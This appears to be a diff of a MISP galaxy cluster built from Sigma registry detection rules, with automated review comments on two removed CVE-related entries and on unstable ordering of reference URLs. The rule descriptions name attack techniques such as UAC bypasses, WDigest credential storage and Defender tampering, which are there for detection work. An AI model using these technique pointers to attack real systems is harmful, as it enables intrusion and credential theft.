- "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
"https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
+ "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
+ "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml"
],
"tags": [
@@ -17165,8 +16860,8 @@
"logsource.category": "registry_add",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/amsi.html",
"https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
+ "https://persistence-info.github.io/Data/amsi.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml"
],
"tags": [
@@ -17256,8 +16951,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml"
],
"tags": [
@@ -17298,8 +16993,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/",
"https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml",
+ "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/",
"https://twitter.com/Hexacorn/status/991447379864932352",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"
],
@@ -17366,8 +17061,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN",
"https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml"
],
"tags": [
@@ -17387,50 +17082,6 @@
"uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6",
"value": "Potential Persistence Via App Paths Default Property"
},
- {
- "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum",
- "meta": {
- "author": "Sittikorn S, frack113",
- "creation_date": "2021/07/16",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml",
- "level": "critical",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
- "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1566",
- "attack.t1203",
- "cve.2021.33771",
- "cve.2021.31979"
- ]
- },
- "related": [
- {
- "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00",
- "value": "CVE-2021-31979 CVE-2021-33771 Exploits"
- },
{
"description": "Detect set Notification_Suppress to 1 to disable the windows security center notification",
"meta": {
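Review bot: this hunk drops the "CVE-2021-31979 CVE-2021-33771 Exploits" cluster (uuid 32b5db62-cb5f-4266-9639-0fa48376ac00), which was the only entry in this section carrying the cve.2021.31979 and cve.2021.33771 tags and the two related-to links. As with the OilRig removal above, existing tags in deployed MISP instances will now point at a missing uuid; if the upstream rule was deprecated rather than deleted, consider retaining the cluster so the CVE tags and their ATT&CK cross-references remain resolvable.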
@@ -17477,8 +17128,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
"https://persistence-info.github.io/Data/htmlhelpauthor.html",
+ "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml"
],
"tags": [
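Review bot: the refs array for registry_set_persistence_chm.yml changes only in order (the hexacorn.com link moves below the persistence-info.github.io link), and the same pure reorder repeats in most of the hunks that follow; this looks like unstable ordering in the generator rather than an intended edit, and it buries the two real removals in this patch under hundreds of lines of churn. Suggest having the generator emit refs in a deterministic order (the order of the upstream rule's references, or a sorted order) so that regenerating the cluster from an unchanged rule produces no diff.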
@@ -17575,8 +17226,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44",
"https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml"
],
"tags": [
@@ -17676,11 +17327,11 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN",
+ "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
"https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/",
- "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6",
"https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html",
+ "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml"
],
"tags": [
@@ -17739,8 +17390,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml"
],
"tags": [
@@ -17773,13 +17424,13 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
"https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
"https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
"http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml"
],
"tags": [
@@ -17846,8 +17497,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
"https://twitter.com/malmoeb/status/1560536653709598721",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml"
],
"tags": [
@@ -17872,8 +17523,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml"
],
"tags": [
@@ -17901,39 +17552,6 @@
"uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298",
"value": "Session Manager Autorun Keys Modification"
},
- {
- "description": "Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/04/05",
- "falsepositive": [
- "Legitimate reminders received for a task or a note will also trigger this rule."
- ],
- "filename": "registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml",
- "level": "low",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1137"
- ]
- },
- "related": [
- {
- "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fc06e655-d98c-412f-ac76-05c2698b1cb2",
- "value": "Outlook Task/Note Reminder Received"
- },
{
"description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes",
"meta": {
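Review bot: same concern as the first removal: the "Outlook Task/Note Reminder Received" element (uuid fc06e655-d98c-412f-ac76-05c2698b1cb2) and its related link to 2c4d4e92-0ccf-4a97-b54c-86d662988a53 disappear without a deprecation marker, even though the rule documents a CVE-2023-23397 investigation pivot that analysts may have used to tag events. Within this hunk there is only a removal and no replacement entry, so confirm that the upstream file registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml was actually retired rather than moved or renamed before dropping the uuid.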
@@ -17947,8 +17565,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
"https://persistence-info.github.io/Data/wer_debugger.html",
+ "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml"
],
"tags": [
@@ -17994,8 +17612,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass",
"https://www.exploit-db.com/exploits/47696",
+ "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml"
],
"tags": [
@@ -18069,8 +17687,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
"https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml"
],
"tags": [
@@ -18103,9 +17721,9 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
"https://twitter.com/inversecos/status/1494174785621819397",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml"
],
"tags": [
@@ -18222,8 +17840,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://vanmieghem.io/stealth-outlook-persistence/",
"https://twitter.com/_vivami/status/1347925307643355138",
+ "https://vanmieghem.io/stealth-outlook-persistence/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml"
],
"tags": [
@@ -18258,9 +17876,9 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
],
"tags": [
@@ -18361,8 +17979,8 @@
"logsource.product": "windows",
"refs": [
"https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
- "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html",
"https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials",
+ "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml"
],
"tags": [
@@ -18395,8 +18013,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml"
],
"tags": [
@@ -18541,8 +18159,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml"
],
"tags": [
@@ -18608,8 +18226,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
"https://github.com/last-byte/PersistenceSniper",
+ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml"
],
"tags": [
@@ -18708,8 +18326,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
+ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml"
],
"tags": [
@@ -18765,8 +18383,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/WhichbufferArda/status/1543900539280293889",
"https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
+ "https://twitter.com/WhichbufferArda/status/1543900539280293889",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml"
],
"tags": [
@@ -18942,8 +18560,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml"
],
"tags": [
@@ -18979,8 +18597,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml"
],
"tags": [
@@ -19060,8 +18678,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
"https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_databases.yml"
],
"tags": [
@@ -19229,8 +18847,8 @@
"refs": [
"https://persistence-info.github.io/Data/userinitmprlogonscript.html",
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
],
"tags": [
@@ -19370,13 +18988,13 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
"https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
"https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
"http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml"
],
"tags": [
@@ -19445,8 +19063,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml"
],
"tags": [
@@ -19481,8 +19099,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml"
],
"tags": [
@@ -19548,8 +19166,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
"https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml"
],
"tags": [
@@ -19599,8 +19217,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
+ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml"
],
"tags": [
@@ -19791,9 +19409,9 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
"https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml"
],
"tags": [
@@ -19828,8 +19446,8 @@
"logsource.product": "windows",
"refs": [
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml"
],
"tags": [
@@ -20117,10 +19735,10 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
],
"tags": [
@@ -20221,8 +19839,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
"https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml"
],
"tags": [
@@ -20257,8 +19875,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml"
],
"tags": [
@@ -20308,8 +19926,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
"https://persistence-info.github.io/Data/hhctrl.html",
+ "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml"
],
"tags": [
@@ -20532,8 +20150,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
"https://persistence-info.github.io/Data/naturallanguage6.html",
+ "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml"
],
"tags": [
@@ -20589,8 +20207,8 @@
"logsource.category": "registry_set",
"logsource.product": "windows",
"refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
